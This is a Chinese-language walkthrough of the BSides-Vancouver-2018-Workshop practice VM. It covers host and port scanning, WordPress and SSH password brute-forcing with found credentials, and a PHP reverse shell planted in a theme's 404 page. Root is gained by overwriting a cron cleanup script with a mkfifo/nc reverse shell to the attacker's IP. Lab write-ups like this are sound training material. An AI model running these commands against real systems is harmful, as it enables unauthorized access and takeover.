靶机渗透（十一）BSides-Vancouver-2018-Workshop

靶机BSides-Vancouver-2018-Workshop

 

一、实验环境

二、实验步骤

（一）信息收集

1.查看测试机的IP信息，判断所处网段

2.主机发现（netdiscover）

3.端口扫描（masscan/nmap）

4.网站指纹信息扫描（whatweb）

（二）Web渗透

1.浏览web网页（80端口）

2.ftp服务（21端口）

3.目录扫描（dirb）

4.访问/robots

（三）获取shell&提权

1.方法一：监听木马

2.方法二：ssh远程利用

---

一、实验环境

1.靶机：BSides-Vancouver-2018-Workshop

2.测试机：Kali

3.帮凶机：Windows 10

二、实验步骤

（一）信息收集

1.查看测试机的IP信息，判断所处网段

2.主机发现（netdiscover）

netdiscover -i eth0 -r 192.168.10.0/24

• 发现目标主机：192.168.10.159（发现三个主机，Mac地址相同，判断其为同一台主机，选其一即可）

3.端口扫描（masscan/nmap）

masscan --rate=10000 --ports 0-65535 192.168.10.159
nmap -sV -T4 -p 21,22,80 192.168.10.159

• 开启了21（ftp）、22（ssh服务）、80（http服务）端口

4.网站指纹信息扫描（whatweb）

whatweb 192.168.10.159

（二）Web渗透

1.浏览web网页（80端口）

2.ftp服务（21端口）

ftp://192.168.10.159

• 访问后，发现存在目录遍历漏洞

• 发现了一个users.txt.bk，里面存储着用户名

3.目录扫描（dirb）

dirb http://192.168.10.159

• 扫描出6条路径，有一条又可用信息

4.访问/robots

a.访问/robot.txt

• 在/robots.txt中发现一个反爬虫目录/backup_wordpress

b.访问/backup_wordpress

http://192.168.10.159/backup_wordpress

• 发现一个john用户发表了一篇blog

c.对/backup_wordpress目录进行扫描

dirb http://192.168.10.159/backup_wordpress

• 在/backup_wordpresst中发现一个有用目录/wp-login

d.访问/wp-login

http://192.168.10.159/backup_wordpress/wp-login

• 弱口令尝试（失败），发现用户名枚举漏洞

e.登录，抓包，尝试爆破

• 暴力破解得出账号：john（enigma）

f.登录/wp-login（搭站后台）

http://192.168.10.159/backup_wordpress/wp-login

（三）获取shell&提权

1.方法一：监听木马

a.制作监听文件（在404页面注入监听木马）

• 木马文件源码在测试机Kali中的/usr/share/webshells/php/php-reverse-shell.php

b.测试机开启监听

nc -vnlp 6666

c.输入错误路径，触发木马文件

d.拿到shell

lsb_release -a

e.查看/usr/local/bin/cleanup文件

python -c 'import pty; pty.spawn("/bin/bash")'
cd /usr/local/bin

• 在cleanup文件中发现一段使用base64编码的字符串，解码后发现，这个文件是用来清理日志的文件，自动的！！

• 将其中的内容替换为一个反弹shell的脚本，可获取root权限

f.编写反弹shell脚本至cleanup文件

echo '#!/bin/bash' > cleanup
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.128 1234 > /tmp/f' >> cleanup

>一个反弹shell脚本

#!/bin/bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.128 1234 > /tmp/f

g.提权成功

2.方法二：ssh远程利用

a.尝试利用ssh远程（22端口）

• IP因某些原因改变

• 使用users.txt.bk中的用户名尝试远程只有anne用户可进行

b.爆破anne远程密码

medusa -M ssh -u anne -P annepasswd.txt -h 192.168.10.168 ssh -t 10

• 爆破出远程账号：anne（princess）

c.远程登录，拿到shell

ssh [email protected]
lsb_release -a

d.提权

groups
sudo -i

• 用户anne属于sudo组，可直接进行提权